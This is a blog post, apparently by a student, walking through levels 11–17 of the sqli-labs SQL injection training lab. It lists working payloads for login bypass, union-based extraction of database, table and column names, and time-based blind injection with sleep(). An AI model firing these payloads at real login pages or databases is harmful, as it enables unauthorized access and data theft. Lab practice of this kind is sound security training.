sqlilab 11-17之看不懂的教程

于 2019-01-19 15:45:07 发布
阅读量815 收藏 1
点赞数 1
分类专栏: NYIST
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_43668491/article/details/86553107
版权

第十一关:打开发现是一个登录页面,这时候我第一时间想到的是万能密码,通过尝试,username输入admin' or 1 -- #后成功登录,接着是order by查询字段数;

输入1‘ order by 3 登录后页面报错,说明有2个字段;

然后输入1' union select 1,2 #,判断出页面有两个显示位;

接下来就是爆数据库名,数据表名,字段名了;

爆数据库名:123' union select 1,group_concat(schema_name) from information_schema.schemata -- #

爆数据表名:123' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --  #

爆字段名:123' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' -- #

第十二关:通过尝试和报错信息发现输入1") or 1 #后可以用万能密码登录,接下来同上;

第十三关:通过万能密码找到注入点为'),但是页面没有任何返回信息,只能进行盲注;

 

猜测数据库长度:
123') or length(database())>5 and sleep(5)#
猜测数据库名第一位:
123') or left(version(),1)>'a' and sleep(5)#
猜测库中的表名:
123') or ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))>101 and sleep(5)#
 

第十四关:同十三关,注入点为双引号闭合;

第十五关:同样,用万能密码的方法找到注入点为单引号闭合,接下来同十三关;

第十六关:通过延时注入的方法判断注入点,当输入admin") and sleep(5) -- #时页面停留了5s,找出注入点后其余同十三关;

第十七关:这题成功做到自闭。。。找了半天的注入点没找到,最后查看源码发现注入点在密码处,这样就简单了,剩下的都是延时注入的套路;

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值